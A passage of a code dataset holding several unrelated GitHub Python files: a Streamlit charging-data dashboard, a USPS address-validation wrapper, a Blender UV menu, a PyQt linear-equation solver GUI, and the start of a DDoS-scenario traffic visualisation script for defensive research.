    \",\n \tunsafe_allow_html=True,\n )\n fig2 = px.scatter(df, x='dollars', y='chargeTimeHrs', size ='col3') \n st.plotly_chart(fig2)\n\n \n\n\nmanager_unique = df['managerVehicle'].unique()\nfiltre = st.sidebar.selectbox(\"Manager Vehicle ? \", manager_unique)\nmanager = df[df['managerVehicle']== filtre]\n\n#pi = manager.groupby(['facilityType'])['managerVehicle'].count()\n\nlabel = ['Type 1','Type 2','Type 3','Type 4']\ny = manager.groupby(['facilityType'])['managerVehicle'].count()\n#plt.style.use('seaborn-colorblind')\nfig1, ax1 = plt.subplots()\nax1.pie(y, labels=label, colors = color, autopct='%1.0f%%')\nplt.title('repartiton of the charger Type')\n\n\n\n\nst.pyplot()\n\n\n\n\n\n\n \n \n","repo_name":"bktraore/Ironhack_Project5_Electriccars_dataViz_streamlit","sub_path":"project5/project5_cleaning.py","file_name":"project5_cleaning.py","file_ext":"py","file_size_in_byte":5264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"29886226280","text":"from collections import OrderedDict\nfrom lxml import etree, objectify\nfrom lxml.builder import E\n\nfrom api import BaseAPI\nfrom exceptions import USPSInvalidAddress\n\n\nclass AddressValidation(BaseAPI):\n \"Implements the Address Validation\"\n\n @classmethod\n def address_request_type(cls, id='0', **kwargs):\n \"\"\"\n Builds a AddressValidation xml from the given lxml elements\n\n API Docs:\n https://www.usps.com/business/web-tools-apis/address-information-api.htm\n\n Request:\n \n
    <AddressValidateRequest USERID=\"xxxx\">\n <Address ID=\"0\">\n <FirmName>XYZ Corp.</FirmName>\n <Address1></Address1>\n <Address2>6406 Ivy Lane</Address2>\n <City>Greenbelt</City>\n <State>MD</State>\n <Zip5></Zip5>\n <Zip4></Zip4>\n </Address>\n </AddressValidateRequest>\n\n Response:\n <AddressValidateResponse>\n <Address ID=\"0\">\n <FirmName>XYZ Corp.</FirmName>\n <Address2>6406 IVY LN</Address2>\n <City>GREENBELT</City>\n <State>MD</State>\n <Zip5>20770</Zip5>\n <Zip4>1441</Zip4>\n </Address>\n </AddressValidateResponse>
    \n\n :param FirmName: U.S. city to be validated. (A valid city/state/postal\n code combination must be included as input)\n :param Address1: State to be validated. (A valid\n city/state/postal code combination must be\n included as input)\n :param Address2: Country code 2 Digits\n :param City: Postal code\n :param State: Postal code\n ::\n \"\"\"\n # USPS excpected elements to be in order\n values = OrderedDict((\n ('FirmName', ''),\n ('Address1', ''),\n ('Address2', ''),\n ('City', ''),\n ('State', ''),\n ('Zip5', ''),\n ('Zip4', ''),\n ))\n values.update(kwargs)\n elements = cls.make_elements([], [], values)\n return E.Address(*elements, ID=id)\n\n def look_for_error(self, response):\n \"\"\"\n Look for address specific errors in response\n \"\"\"\n super(AddressValidation, self).look_for_error(response)\n\n # Look for address specific error\n try:\n error = response.Address.Error\n except AttributeError:\n return None\n else:\n raise USPSInvalidAddress(\"%s-%s:%s\" % (\n error.Source,\n error.Number,\n error.Description,\n ), response)\n\n def request(self, address_type):\n \"\"\"\n Calls up USPS and send the request. Get the returned response and\n return an element built out of it.\n\n :param address_type: lxml element with data for the address request\n type\n \"\"\"\n full_address_type = E.AddressValidateRequest(\n address_type, USERID=self.username\n )\n full_request = etree.tostring(full_address_type)\n\n # Send the request\n result = self.send_request(\n self.urls['secure'],\n api_type='Verify',\n data_xml=full_request\n )\n response = objectify.fromstring(result)\n self.look_for_error(response)\n return response\n","repo_name":"openlabs/trytond-shipping-usps","sub_path":"usps/address_validation.py","file_name":"address_validation.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"30461587693","text":"# \n\n# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\nimport bpy\n\n__author__ = \"Nutti \"\n__status__ = \"production\"\n__version__ = \"3.2\"\n__date__ = \"20 Jun 2015\"\n\nfrom . import cpuv_default_operation\nfrom . import cpuv_selseq_operation\nfrom . import cpuv_uvmap_operation\nfrom . import cpuv_fliprot_operation\nfrom . 
import cpuv_transfer_uv_operation\n\n\n# master menu\nclass CPUVMenu(bpy.types.Menu):\n bl_idname = \"uv.cpuv_menu\"\n bl_label = \"Copy/Paste UV\"\n bl_description = \"Copy and Paste UV Menu\"\n\n def draw(self, context):\n self.layout.operator(cpuv_default_operation.CPUVCopyUV.bl_idname)\n self.layout.operator(cpuv_default_operation.CPUVPasteUV.bl_idname)\n self.layout.operator(cpuv_selseq_operation.CPUVSelSeqCopyUV.bl_idname)\n self.layout.operator(cpuv_selseq_operation.CPUVSelSeqPasteUV.bl_idname)\n self.layout.menu(cpuv_uvmap_operation.CPUVUVMapCopyUV.bl_idname)\n self.layout.menu(cpuv_uvmap_operation.CPUVUVMapPasteUV.bl_idname)\n self.layout.operator(cpuv_fliprot_operation.CPUVFlipRotate.bl_idname)\n self.layout.operator(\n cpuv_transfer_uv_operation.CPUVTransferUVCopy.bl_idname)\n self.layout.operator(\n cpuv_transfer_uv_operation.CPUVTransferUVPaste.bl_idname)\n","repo_name":"mkbreuer/ToolPlus","sub_path":"2.78/Sets/toolplus_display/uv_magic/cpuv_menu.py","file_name":"cpuv_menu.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"34"} +{"seq_id":"12600151740","text":"import gc\n\nfrom CroutDecomposition import *\nfrom GaussElimination import *\nfrom JacobiGaussSeidel import *\nfrom answer import *\nfrom Cheloskey import *\nfrom LUDecomposition import *\n\ndimension = 3\nmethod = 0\nreadX = False\nanswer = ''\n\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(848, 584)\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 243, 240))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 243, 240))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 243, 240))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 243, 240))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 243, 240))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)\n MainWindow.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily(\"Sitka Text\")\n font.setBold(True)\n font.setWeight(75)\n MainWindow.setFont(font)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.gridLayoutWidget = QtWidgets.QWidget(self.centralwidget)\n self.gridLayoutWidget.setGeometry(QtCore.QRect(0, 0, MainWindow.width(), MainWindow.height()))\n self.gridLayoutWidget.setObjectName(\"gridLayoutWidget\")\n self.gridLayout = QtWidgets.QGridLayout(self.gridLayoutWidget)\n self.gridLayout.setContentsMargins(0, 0, 0, 0)\n self.gridLayout.setObjectName(\"gridLayout\")\n self.title = QtWidgets.QLabel(self.gridLayoutWidget)\n font = QtGui.QFont()\n font.setFamily(\"Yu Gothic\")\n font.setPointSize(20)\n font.setBold(False)\n font.setWeight(50)\n self.title.setFont(font)\n self.title.setAlignment(QtCore.Qt.AlignCenter)\n self.title.setObjectName(\"title\")\n 
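# layout sketch: the title label sits in row 0 of the main grid; the A/B/X matrices\n # strip (MatricesGrid) is added at row 1 and the control panel (toolsGrid) at row 2\n 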
self.gridLayout.addWidget(self.title, 0, 0, 1, 1)\n self.toolsGrid = QtWidgets.QGridLayout()\n self.toolsGrid.setObjectName(\"toolsGrid\")\n self.method_combo = QtWidgets.QComboBox(self.gridLayoutWidget)\n self.method_combo.setModelColumn(0)\n self.method_combo.setObjectName(\"method_combo\")\n self.method_combo.addItem(\"\")\n self.method_combo.addItem(\"\")\n self.method_combo.addItem(\"\")\n self.method_combo.addItem(\"\")\n self.method_combo.addItem(\"\")\n self.method_combo.addItem(\"\")\n self.method_combo.currentIndexChanged.connect(self.on_method_changed)\n self.toolsGrid.addWidget(self.method_combo, 1, 1, 1, 1)\n self.iterations_number = QtWidgets.QSpinBox(self.gridLayoutWidget)\n self.iterations_number.setProperty(\"value\", 3)\n self.iterations_number.setObjectName(\"iterations_number\")\n self.toolsGrid.addWidget(self.iterations_number, 7, 1, 1, 1)\n self.methods_label = QtWidgets.QLabel(self.gridLayoutWidget)\n self.methods_label.setObjectName(\"methods_label\")\n self.toolsGrid.addWidget(self.methods_label, 1, 0, 1, 1)\n self.decomposition_method_combo = QtWidgets.QComboBox(self.gridLayoutWidget)\n self.decomposition_method_combo.setObjectName(\"decomposition_method_combo\")\n self.decomposition_method_combo.addItem(\"\")\n self.decomposition_method_combo.addItem(\"\")\n self.decomposition_method_combo.addItem(\"\")\n self.toolsGrid.addWidget(self.decomposition_method_combo, 5, 1, 1, 1)\n self.significant_figures_label = QtWidgets.QLabel(self.gridLayoutWidget)\n self.significant_figures_label.setObjectName(\"significant_figures_label\")\n self.toolsGrid.addWidget(self.significant_figures_label, 4, 0, 1, 1)\n self.paremters_label = QtWidgets.QLabel(self.gridLayoutWidget)\n self.paremters_label.setObjectName(\"paremters_label\")\n self.toolsGrid.addWidget(self.paremters_label, 5, 0, 1, 1)\n self.absolute_erroe_label = QtWidgets.QLabel(self.gridLayoutWidget)\n self.absolute_erroe_label.setObjectName(\"absolute_erroe_label\")\n self.toolsGrid.addWidget(self.absolute_erroe_label, 6, 0, 1, 1)\n self.significant_figures_spin = QtWidgets.QSpinBox(self.gridLayoutWidget)\n self.significant_figures_spin.setProperty(\"value\", 3)\n self.significant_figures_spin.setObjectName(\"significant_figures_spin\")\n self.toolsGrid.addWidget(self.significant_figures_spin, 4, 1, 1, 1)\n self.dimensionA_spin = QtWidgets.QSpinBox(self.gridLayoutWidget)\n self.dimensionA_spin.setProperty(\"value\", 3)\n self.dimensionA_spin.setObjectName(\"dimensionA_spin\")\n self.toolsGrid.addWidget(self.dimensionA_spin, 0, 1, 1, 1)\n self.matrixA_dimen = QtWidgets.QLabel(self.gridLayoutWidget)\n self.matrixA_dimen.setObjectName(\"matrixA_dimen\")\n self.toolsGrid.addWidget(self.matrixA_dimen, 0, 0, 1, 1)\n self.iterations_number_label = QtWidgets.QLabel(self.gridLayoutWidget)\n self.iterations_number_label.setObjectName(\"iterations_number_label\")\n self.toolsGrid.addWidget(self.iterations_number_label, 7, 0, 1, 1)\n self.absolute_relative_error_text = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.absolute_relative_error_text.setObjectName(\"absolute_relative_error_text\")\n self.toolsGrid.addWidget(self.absolute_relative_error_text, 6, 1, 1, 1)\n self.gridLayout.addLayout(self.toolsGrid, 2, 0, 1, 1)\n self.gridLayout_2 = QtWidgets.QGridLayout()\n self.gridLayout_2.setObjectName(\"gridLayout_2\")\n self.calculate_button = QtWidgets.QPushButton(self.gridLayoutWidget)\n font = QtGui.QFont()\n font.setFamily(\"Nirmala UI Semilight\")\n font.setPointSize(10)\n font.setBold(False)\n font.setItalic(False)\n 
font.setWeight(50)\n self.calculate_button.setFont(font)\n self.calculate_button.setObjectName(\"calculate_button\")\n self.gridLayout_2.addWidget(self.calculate_button, 0, 1, 1, 1)\n spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.gridLayout_2.addItem(spacerItem, 0, 2, 1, 1)\n spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.gridLayout_2.addItem(spacerItem1, 0, 0, 1, 1)\n self.gridLayout.addLayout(self.gridLayout_2, 3, 0, 1, 1)\n self.MatricesGrid = QtWidgets.QHBoxLayout()\n self.MatricesGrid.setSizeConstraint(QtWidgets.QLayout.SetNoConstraint)\n self.MatricesGrid.setObjectName(\"MatricesGrid\")\n self.matrixA_label = QtWidgets.QLabel(self.gridLayoutWidget)\n self.matrixA_label.setObjectName(\"matrixA_label\")\n self.MatricesGrid.addWidget(self.matrixA_label)\n self.MatrixAGrid = QtWidgets.QGridLayout()\n self.MatrixAGrid.setObjectName(\"MatrixAGrid\")\n self.A00 = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.A00.setObjectName(\"A00\")\n self.MatrixAGrid.addWidget(self.A00, 0, 0, 1, 1)\n self.A01 = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.A01.setObjectName(\"A01\")\n self.MatrixAGrid.addWidget(self.A01, 0, 1, 1, 1)\n self.A02 = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.A02.setObjectName(\"A02\")\n self.MatrixAGrid.addWidget(self.A02, 0, 2, 1, 1)\n\n self.A11 = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.A11.setObjectName(\"A11\")\n self.MatrixAGrid.addWidget(self.A11, 1, 1, 1, 1)\n self.A20 = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.A20.setObjectName(\"A20\")\n self.MatrixAGrid.addWidget(self.A20, 2, 0, 1, 1)\n\n self.A12 = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.A12.setObjectName(\"A12\")\n self.MatrixAGrid.addWidget(self.A12, 1, 2, 1, 1)\n self.A21 = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.A21.setObjectName(\"A21\")\n self.MatrixAGrid.addWidget(self.A21, 2, 1, 1, 1)\n self.A10 = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.A10.setObjectName(\"A10\")\n self.MatrixAGrid.addWidget(self.A10, 1, 0, 1, 1)\n self.A22 = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.A22.setObjectName(\"A22\")\n self.MatrixAGrid.addWidget(self.A22, 2, 2, 1, 1)\n self.MatricesGrid.addLayout(self.MatrixAGrid)\n self.matrixB_label = QtWidgets.QLabel(self.gridLayoutWidget)\n self.matrixB_label.setObjectName(\"matrixB_label\")\n self.MatricesGrid.addWidget(self.matrixB_label)\n self.MatrixB_grid = QtWidgets.QVBoxLayout()\n self.MatrixB_grid.setObjectName(\"MatrixB_grid\")\n self.B0 = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.B0.setObjectName(\"B0\")\n self.MatrixB_grid.addWidget(self.B0)\n self.B1 = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.B1.setObjectName(\"B1\")\n self.MatrixB_grid.addWidget(self.B1)\n self.B2 = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.B2.setObjectName(\"B2\")\n self.MatrixB_grid.addWidget(self.B2)\n self.MatricesGrid.addLayout(self.MatrixB_grid)\n self.matrixX_label = QtWidgets.QLabel(self.gridLayoutWidget)\n self.matrixX_label.setObjectName(\"matrixX_label\")\n self.MatricesGrid.addWidget(self.matrixX_label)\n self.MatrixX_grid = QtWidgets.QVBoxLayout()\n self.MatrixX_grid.setObjectName(\"MatrixX_grid\")\n self.X0 = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.X0.setObjectName(\"X0\")\n self.MatrixX_grid.addWidget(self.X0)\n self.X1 = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.X1.setObjectName(\"X1\")\n self.MatrixX_grid.addWidget(self.X1)\n self.X2 = 
QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.X2.setObjectName(\"X2\")\n self.MatrixX_grid.addWidget(self.X2)\n self.MatricesGrid.addLayout(self.MatrixX_grid)\n self.gridLayout.addLayout(self.MatricesGrid, 1, 0, 1, 1)\n MainWindow.setCentralWidget(self.centralwidget)\n size = QtWidgets.QDesktopWidget().screenGeometry(-1)\n self.gridLayoutWidget.setGeometry(QtCore.QRect(10, 20, size.width() - 20, size.height() - 100))\n MainWindow.setWindowFlags(QtCore.Qt.WindowCloseButtonHint | QtCore.Qt.WindowMinimizeButtonHint)\n MainWindow.showMaximized()\n self.reset()\n\n # MainWindow.setFixedSize(self.gridLayoutWidget.sizeHint())\n self.dimensionA_spin.valueChanged.connect(self.dimension_changed)\n self.newDimension = 3\n self.prevDimension = 3\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def reset(self):\n global readX\n readX = False\n self.decomposition_method_combo.setVisible(False)\n self.paremters_label.setVisible(False)\n self.absolute_erroe_label.setVisible(False)\n self.absolute_relative_error_text.setVisible(False)\n self.iterations_number.setVisible(False)\n self.iterations_number_label.setVisible(False)\n\n def on_method_changed(self, index):\n # number of method to be executed\n global method\n method = index\n print(method)\n if index == 3:\n self.reset()\n self.decomposition_method_combo.setVisible(True)\n self.paremters_label.setVisible(True)\n elif index == 4 or index == 5:\n self.reset()\n self.absolute_erroe_label.setVisible(True)\n self.absolute_relative_error_text.setVisible(True)\n self.iterations_number.setVisible(True)\n self.iterations_number_label.setVisible(True)\n else:\n self.reset()\n\n def dimension_changed(self):\n global dimension\n self.newDimension = self.dimensionA_spin.value()\n if self.newDimension > dimension:\n for i in range(0, self.newDimension):\n temp = QtWidgets.QLineEdit(self.gridLayoutWidget)\n temp.setObjectName(\"A\" + str(i) + str(self.newDimension - 1))\n self.MatrixAGrid.addWidget(temp, i, self.newDimension - 1, 1, 1)\n\n for i in range(0, self.newDimension - 1):\n temp = QtWidgets.QLineEdit(self.gridLayoutWidget)\n temp.setObjectName(\"A\" + str(self.newDimension - 1) + str(i))\n self.MatrixAGrid.addWidget(temp, self.newDimension - 1, i, 1, 1)\n temp = QtWidgets.QLineEdit(self.gridLayoutWidget)\n temp.setObjectName(\"B\" + str(self.newDimension - 1))\n self.MatrixB_grid.addWidget(temp)\n temp = QtWidgets.QLineEdit(self.gridLayoutWidget)\n temp.setObjectName(\"X\" + str(self.newDimension - 1))\n self.MatrixX_grid.addWidget(temp)\n else:\n for i in range(0, self.newDimension + 1):\n temp = self.gridLayoutWidget.findChild(QtWidgets.QLineEdit, \"A\" + str(i) + str(self.newDimension))\n temp.setParent(None)\n del temp\n\n for i in range(0, self.newDimension):\n temp = self.gridLayoutWidget.findChild(QtWidgets.QLineEdit, \"A\" + str(self.newDimension) + str(i))\n temp.setParent(None)\n del temp\n\n temp = self.gridLayoutWidget.findChild(QtWidgets.QLineEdit, \"B\" + str(self.newDimension))\n temp.setParent(None)\n del temp\n temp = self.gridLayoutWidget.findChild(QtWidgets.QLineEdit, \"X\" + str(self.newDimension))\n temp.setParent(None)\n del temp\n gc.collect()\n dimension = self.newDimension\n\n def readMatrices(self):\n global dimension\n global method\n self.matrixA = [[0 for x in range(dimension)] for y in range(dimension)]\n self.matrixB = [0 for x in range(dimension)]\n for i in range(0, dimension):\n for j in range(0, dimension):\n # print(\"A\" + str(i) + str(j))\n temp = 
self.gridLayoutWidget.findChild(QtWidgets.QLineEdit, \"A\" + str(i) + str(j)).text()\n if temp == '':\n self.matrixA[i][j] = 0\n else:\n self.matrixA[i][j] = float(temp)\n for i in range(0, dimension):\n temp = self.gridLayoutWidget.findChild(QtWidgets.QLineEdit, \"B\" + str(i)).text()\n if temp == '':\n self.matrixB[i] = 0\n else:\n self.matrixB[i] = float(temp)\n if method == 5 or method == 4:\n self.matrixX = [0 for x in range(dimension)]\n for i in range(0, dimension):\n temp = self.gridLayoutWidget.findChild(QtWidgets.QLineEdit, \"X\" + str(i)).text()\n if temp == '':\n self.matrixX[i] = 0\n else:\n self.matrixX[i] = float(temp)\n # print(self.matrixX)\n\n self.executeMethod()\n\n def executeMethod(self):\n global answer\n global dimension\n numberOfIterations = self.iterations_number.value()\n absolute_error = self.absolute_relative_error_text.text()\n number_of_significant_figures = self.significant_figures_spin.value()\n augumentedMatrixA = deepcopy(self.matrixA)\n method = self.method_combo.currentIndex()\n for i in range(0, dimension):\n augumentedMatrixA[i].append(self.matrixB[i])\n if method == 0:\n answer = gauss(augumentedMatrixA, dimension)\n elif method == 1:\n answer = jordanelimination(augumentedMatrixA, dimension)\n elif method == 2:\n gausswithpivoting(augumentedMatrixA, dimension)\n elif method == 3:\n answer = decomposition_method = self.decomposition_method_combo.currentIndex()\n if decomposition_method == 0:\n answer = downLittleDecomposition(self.matrixA, self.matrixB, dimension, number_of_significant_figures)\n elif decomposition_method == 1:\n answer = crout(self.matrixA, self.matrixB, dimension, number_of_significant_figures, )\n elif decomposition_method == 2:\n answer = cheloskeyDecomposition(self.matrixA, self.matrixB, dimension, number_of_significant_figures)\n elif method == 4:\n if absolute_error == '':\n answer = gauss_seidel(dimension, numberOfIterations, self.matrixA, self.matrixB, self.matrixX,\n number_of_significant_figures)\n else:\n answer = gauss_seidel_absolute_error(dimension, float(absolute_error), self.matrixA, self.matrixB,\n self.matrixX,\n number_of_significant_figures)\n elif method == 5:\n if absolute_error == '':\n answer = jacobi(dimension, numberOfIterations, self.matrixA, self.matrixB, self.matrixX,\n number_of_significant_figures)\n else:\n answer = jacobi_absolute_error(dimension, float(absolute_error), self.matrixA, self.matrixB,\n self.matrixX,\n number_of_significant_figures)\n\n def show_answer(self, ui, window):\n global answer\n self.readMatrices()\n ui.label.setText(answer)\n window.show()\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n self.title.setText(_translate(\"MainWindow\", \"Solving System of Linear Equations\"))\n self.method_combo.setCurrentText(_translate(\"MainWindow\", \"Gauss Elimination\"))\n self.method_combo.setItemText(0, _translate(\"MainWindow\", \"Gauss Elimination\"))\n self.method_combo.setItemText(1, _translate(\"MainWindow\", \"Gaus Jordan Elimination using pivoting\"))\n self.method_combo.setItemText(2, _translate(\"MainWindow\", \"Gauss Jordan\"))\n self.method_combo.setItemText(3, _translate(\"MainWindow\", \"LU Decompostion\"))\n self.method_combo.setItemText(4, _translate(\"MainWindow\", \"Gauss Siedel\"))\n self.method_combo.setItemText(5, _translate(\"MainWindow\", \"Jacobi Iteration\"))\n self.methods_label.setText(_translate(\"MainWindow\", \"Method :\"))\n 
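# item labels for the three LU decomposition variants; this combo box is only made\n # visible when the 'LU Decompostion' entry (index 3) is chosen in on_method_changed\n 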
self.decomposition_method_combo.setItemText(0, _translate(\"MainWindow\", \"Downlittle Form\"))\n self.decomposition_method_combo.setItemText(1, _translate(\"MainWindow\", \"Crout Form\"))\n self.decomposition_method_combo.setItemText(2, _translate(\"MainWindow\", \"Cholesky Form\"))\n self.significant_figures_label.setText(_translate(\"MainWindow\", \"Number of Significant Figures :\"))\n self.paremters_label.setText(_translate(\"MainWindow\", \"Method of decomposition :\"))\n self.absolute_erroe_label.setText(_translate(\"MainWindow\",\n \"Absolute Relative Error : \\n(number of iterations may differ than desired number to achieve error)\"))\n self.matrixA_dimen.setText(_translate(\"MainWindow\", \"Number of variables ( Dimension of A )\"))\n self.iterations_number_label.setText(_translate(\"MainWindow\", \"Number of iterations :\"))\n self.calculate_button.setText(_translate(\"MainWindow\", \"Calculate\"))\n self.matrixA_label.setText(_translate(\"MainWindow\", \"Coefficient Matrix A :\"))\n self.matrixB_label.setText(_translate(\"MainWindow\", \"Constant Matrix B :\"))\n self.matrixX_label.setText(_translate(\"MainWindow\", \"Initial Guess X :\"))\n\n\nif __name__ == \"__main__\":\n import sys\n\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = Ui_MainWindow()\n ui.setupUi(MainWindow)\n MainWindow.show()\n answerWindow = QtWidgets.QMainWindow()\n answer_ui = answer_window()\n answer_ui.setupUi(answerWindow)\n ui.calculate_button.clicked.connect(lambda: ui.show_answer(answer_ui, answerWindow))\n\n sys.exit(app.exec_())\n","repo_name":"sarahelshabrawy/Matrix-Calculator","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":20656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32253025347","text":"import json\nimport time\nfrom ipaddress import IPv4Address\n\nimport gzip\nimport numpy as np\nfrom gyms.hhh.cpp.hhhmodule import SketchHHH as HHHAlgo\nfrom matplotlib import pyplot as plt\nimport matplotlib.gridspec as mgrid\n\nfrom gyms.hhh.flowgen.distgen import TraceSampler\nfrom gyms.hhh.flowgen.traffic_traces import S1, S2, S3\nfrom gyms.hhh.label import Label\nfrom plotting.plot_results import add_vspan_to, get_vspan_spec_for\n\n# This script is used to visualize scenarios by generating an example episode and showing the active benign and attack\n# flows over time. Also the data rate is plotted. 
(Figures 6.2, 6.19, 6.26)\n# Scenarios can be selected by changing the line of code below, then simply run the script.\nscenario = S2() # change this line of code to \"S1()\", \"S2()\", or \"S3()\" to visualize a scenario\n\n\nclass ProgressBar(object):\n\n def __init__(self, maxprogress, step=100, displaysteps=10):\n self.maxprogress = maxprogress\n self.step = step\n self.displaysteps = displaysteps\n self.i = 0\n\n def increment(self):\n self.i += 1\n\n return self.i % (self.maxprogress / self.step) == 0\n\n def update(self):\n p = self.i / self.maxprogress\n e = '\\n' if self.i + 1 == self.maxprogress else ''\n fmt = '\\r [ {:' + str(self.displaysteps) + 's} ] {:3d}%'\n print(fmt.format('#' * round(self.displaysteps * p), round(100 * p)), end=e)\n\n\nclass HHHEntry(object):\n\n @staticmethod\n def copy(other):\n return HHHEntry(other.id, other.len, other.lo, other.hi)\n\n @staticmethod\n def from_dict(d):\n return HHHEntry(d['id'], d['len'], d['lo'], d['hi'])\n\n def __init__(self, id, len, lo, hi):\n self.id = id\n self.len = len\n self.size = Label.subnet_size(self.len)\n self.end = self.id + self.size\n self.lo = lo\n self.hi = hi\n\n def contains(self, other):\n return (self.len < other.len\n and other.id & Label.PREFIXMASK[self.len] == self.id)\n\n def __str__(self):\n return 'HHH(id: {}, len: {}, end: {}, lo: {}, hi: {})'.format(\n self.id, self.len, self.end, self.lo, self.hi)\n\n\ndef reduce_hhhs(hhhs):\n # Subtract lower level frequencies from higher level HHHs\n # to avoid overcounting\n for i in range(len(hhhs)):\n x = hhhs[i]\n for y in hhhs[i + 1:]:\n if y.contains(x):\n y.hi = max(0, y.hi - x.hi)\n y.lo = max(0, y.lo - x.lo)\n return hhhs\n\n\ndef render_hhhs(hhhs, grid, index):\n # Render HHHs onto to a numpy grid with equally\n # distributed item frequencies\n for hhh in hhhs:\n if hhh.hi > 0:\n grid[index, hhh.id: hhh.end] += hhh.hi / hhh.size\n\n\ndef playthrough(trace_sampler, epsilon, phi, minprefix, interval):\n bar = ProgressBar(trace_sampler.maxtime)\n frequencies = np.zeros_like(trace_sampler.rate_grid, dtype=np.float64)\n h = HHHAlgo(epsilon)\n hhhs = []\n time_index = 0\n\n # play through non-zero entries in rate_grid\n for packet, time_index_finished in trace_sampler.samples():\n # update hhh algorithm\n h.update(packet.ip)\n if not time_index_finished:\n continue\n # perform query and calculate hhh coverage\n if time_index % interval == interval - 1 and time_index != trace_sampler.maxtime:\n # HHHs are sorted in descending order of prefix length\n hhhs = [HHHEntry.copy(_) for _ in h.query(phi, minprefix)]\n hhhs = reduce_hhhs(hhhs)\n # Reset the HHH algorithm after querying\n h.clear()\n print(f'===== time index {time_index} =====')\n print(f'number of rules={len(hhhs)}')\n for r in hhhs:\n print(f'{str(IPv4Address(r.id)).rjust(15)}/{r.len} {r.lo, r.hi}')\n render_hhhs(hhhs, frequencies, time_index)\n time_index += 1\n\n if bar.increment():\n bar.update()\n\n return frequencies\n\n\ndef plot(steps, phi, l, flows, rate_grid, attack_grid, hhh_grid=None, squash=False, pattern_id=None):\n fig = plt.figure(figsize=(16, 9))\n gs = mgrid.GridSpec(3, 1)\n\n ax0 = fig.add_subplot(gs[0, :])\n ax1 = fig.add_subplot(gs[1, :])\n ax2 = fig.add_subplot(gs[2, :])\n\n titlesize = 15\n labelsize = 15\n benign_color = 'dodgerblue'\n attack_color = 'crimson'\n benign_grid = rate_grid - attack_grid\n\n def scale(grid, num_bins, axis, transpose=False):\n bins2 = np.linspace(0, grid.shape[axis], num_bins + 1).astype(int)[1:]\n split = np.split(grid, bins2[:-1], axis=axis)\n 
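# sum each chunk between consecutive bins2 edges, downsampling the grid to num_bins\n # rows; bins2 (the right-hand edges) is reused below as pcolormesh coordinates\n 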
